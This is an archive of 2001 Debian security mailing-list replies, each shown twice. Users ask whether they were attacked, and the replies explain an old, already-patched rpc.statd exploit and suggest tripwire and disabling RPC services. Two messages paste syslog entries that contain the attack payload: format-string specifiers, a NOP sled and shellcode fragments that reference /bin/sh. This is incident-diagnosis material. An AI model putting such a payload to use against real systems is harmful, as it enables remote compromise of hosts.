Re: A thought on Layne
Damn, that would be funny. Of course, he's using MS Outlook Express (judging from his headers) so it would probably be have to be his ISP that got rooted. Or his email is the one for his domain of the box that was r00ted. - k -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: A thought on Layne
Damn, that would be funny. Of course, he's using MS Outlook Express (judging from his headers) so it would probably be have to be his ISP that got rooted. Or his email is the one for his domain of the box that was r00ted. - k
Re: rpc.statd being attacked?
I think this is an 800 year old Red Hat exploit, so probably no worries. No need to worry, but any rpc services are lousy to have running anyway. - k - Original Message - From: Daniel Schepler [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, August 21, 2001 4:28 PM Subject: rpc.statd being attacked? I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F F BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10 x%n% 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20 (This is at least the way it reads in less.) For now I've just shut down the rpc.statd daemon, but I was wondering if this is a known attack. -- Daniel Schepler Please don't disillusion me. I [EMAIL PROTECTED]haven't had breakfast yet. -- Orson Scott Card -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: rpc.statd being attacked?
I think this is an 800 year old Red Hat exploit, so probably no worries. No need to worry, but any rpc services are lousy to have running anyway. - k - Original Message - From: Daniel Schepler [EMAIL PROTECTED] To: debian-security@lists.debian.org Sent: Tuesday, August 21, 2001 4:28 PM Subject: rpc.statd being attacked? I've gotten logs several times that read something like Aug 20 19:20:24 adsl-63-193-247-253 rpc.statd[330]: gethostbyname error for ^X F7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7F F BF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10 x%n% 192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20 (This is at least the way it reads in less.) For now I've just shut down the rpc.statd daemon, but I was wondering if this is a known attack. -- Daniel Schepler Please don't disillusion me. I [EMAIL PROTECTED]haven't had breakfast yet. -- Orson Scott Card -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Unidentified subject!
I think you mean 2.4.2 not 2.2.4 =) - k On Wednesday 25 July 2001 07:59 am, John DOE wrote: hi, I got a similar problem on a machine running IPCHAINS. after an upredictable time period the machine suddenly forgets the ethernet card and results 100% packet loss even ifconfig shows the interface is there and then crashes. I can see the card starts blinking and packets are coming but there is nothing in the log about that and the interface is there but it is not. I tried dist-upgrade ( only the base system was installed on it and mc nothing else ) and it did not help. I have changed the ethernet card and it did not help and as a result I changed the distribution to lame Redhat 6.2 for trial and it works, no problem after that my manager said never touch a running system so I could not switch back to debian. My kernel was 2.2.19 pre 17 and nothing unstable. I believe the problem is with the 2.2.19 kernel since the only difference between the base systems of redhat and debian 2.2r3 is 2.2.14 and 2.2.19 not much else. I recommend you to upgrade your sys to 2.2.4 kernel. --- Nick Name [EMAIL PROTECTED] wrote: Hi all. I run a stable with some package from testing (XFree86 4.02 and konqueror). Some week ago in the morning I found my computer had been rebooted by night and found some zeroes in my syslog, just before the reboot. I first thought of a worm, the latest ramen variant (don't remember the name right now), but I didn't find any sign of it. I have changed my passwords, however I am using ipchains. Today my computer has freezed (!!! Its a debian it really shouldn't :) ) and I found those zeroes again after pressing that big red button. Do someone know something about this all? May this be a security problem? Thanks for your attention and sorry for my bad english Vincenzo Ciancia -- Nick Name - [EMAIL PROTECTED] - UIN 94982698 - Vincenzo Ciancia - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] _ Get your free e-mail account: http://www.petekmail.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Unidentified subject!
I think you mean 2.4.2 not 2.2.4 =) - k On Wednesday 25 July 2001 07:59 am, John DOE wrote: hi, I got a similar problem on a machine running IPCHAINS. after an upredictable time period the machine suddenly forgets the ethernet card and results 100% packet loss even ifconfig shows the interface is there and then crashes. I can see the card starts blinking and packets are coming but there is nothing in the log about that and the interface is there but it is not. I tried dist-upgrade ( only the base system was installed on it and mc nothing else ) and it did not help. I have changed the ethernet card and it did not help and as a result I changed the distribution to lame Redhat 6.2 for trial and it works, no problem after that my manager said never touch a running system so I could not switch back to debian. My kernel was 2.2.19 pre 17 and nothing unstable. I believe the problem is with the 2.2.19 kernel since the only difference between the base systems of redhat and debian 2.2r3 is 2.2.14 and 2.2.19 not much else. I recommend you to upgrade your sys to 2.2.4 kernel. --- Nick Name [EMAIL PROTECTED] wrote: Hi all. I run a stable with some package from testing (XFree86 4.02 and konqueror). Some week ago in the morning I found my computer had been rebooted by night and found some zeroes in my syslog, just before the reboot. I first thought of a worm, the latest ramen variant (don't remember the name right now), but I didn't find any sign of it. I have changed my passwords, however I am using ipchains. Today my computer has freezed (!!! Its a debian it really shouldn't :) ) and I found those zeroes again after pressing that big red button. Do someone know something about this all? May this be a security problem? Thanks for your attention and sorry for my bad english Vincenzo Ciancia -- Nick Name - [EMAIL PROTECTED] - UIN 94982698 - Vincenzo Ciancia - -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] _ Get your free e-mail account: http://www.petekmail.com
Re: was I cracked? (rpc.statd, new version)
You can check for modified binaries with tripwire. If this was a decent hacker or even a script kiddie using a good tool, they probably would have purged your logs of all evidence. So either: a) They are second rate or b) They didn't get in - k - Original Message - From: Alvin Oga [EMAIL PROTECTED] To: Lukas Eppler [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Wednesday, July 11, 2001 5:45 PM Subject: Re: was I cracked? (rpc.statd, new version) hi ya lukas how did you check for modified binaries ??? if its an upto date deb box... its a failed attempt... if its a redhat box...time to go digging... you have to check the filesize of the binaries... not just the date... compared to one that you know is NOT compromized... and if you really paranoid...run some tests on it.. have fun alvin http://www.Linux-Sec.net -- turn if off stuff .. On Wed, 11 Jul 2001, Lukas Eppler wrote: I have the following entries in /var/log/messages: Jul 9 01:21:03 blue -- MARK -- Jul 9 01:21:11 blue Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for ^XF7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7 FFBF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x% n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220 Jul 9 01:21:11 blue C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\211F3B0^KCD\200 B0^ACD\200E8\177FF Jul 9 01:41:03 blue -- MARK -- I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known exploit fixed. I can't find modified binaries or any strange behaviour... was this a defeated attack? The second line says /bin/sh somewhere which makes me a bit concerned... Was I cracked? Lukas -- Tempobrain AG - Dufourstrasse 179 - 8008 Zürich http://www.tempobrain.com | icq # 5856 2285 +44 20 7233 6206 | +44 79 8037 7312 +41 1 389 29 29 | +41 76 373 07 87 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: was I cracked? (rpc.statd, new version)
You can check for modified binaries with tripwire. If this was a decent hacker or even a script kiddie using a good tool, they probably would have purged your logs of all evidence. So either: a) They are second rate or b) They didn't get in - k - Original Message - From: Alvin Oga [EMAIL PROTECTED] To: Lukas Eppler [EMAIL PROTECTED] Cc: debian-security@lists.debian.org Sent: Wednesday, July 11, 2001 5:45 PM Subject: Re: was I cracked? (rpc.statd, new version) hi ya lukas how did you check for modified binaries ??? if its an upto date deb box... its a failed attempt... if its a redhat box...time to go digging... you have to check the filesize of the binaries... not just the date... compared to one that you know is NOT compromized... and if you really paranoid...run some tests on it.. have fun alvin http://www.Linux-Sec.net -- turn if off stuff .. On Wed, 11 Jul 2001, Lukas Eppler wrote: I have the following entries in /var/log/messages: Jul 9 01:21:03 blue -- MARK -- Jul 9 01:21:11 blue Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for ^XF7FFBF^XF7FFBF^YF7FFBF^YF7FFBF^ZF7FFBF^ZF7 FFBF^[F7FFBF^[F7FFBF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x% n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220 Jul 9 01:21:11 blue C7^F/binC7F^D/shA0C0\210F^G\211v^L\215V^P\215N^L\211F3B0^KCD\200 B0^ACD\200E8\177FF Jul 9 01:41:03 blue -- MARK -- I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known exploit fixed. I can't find modified binaries or any strange behaviour... was this a defeated attack? The second line says /bin/sh somewhere which makes me a bit concerned... Was I cracked? Lukas -- Tempobrain AG - Dufourstrasse 179 - 8008 Zürich http://www.tempobrain.com | icq # 5856 2285 +44 20 7233 6206 | +44 79 8037 7312 +41 1 389 29 29 | +41 76 373 07 87 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
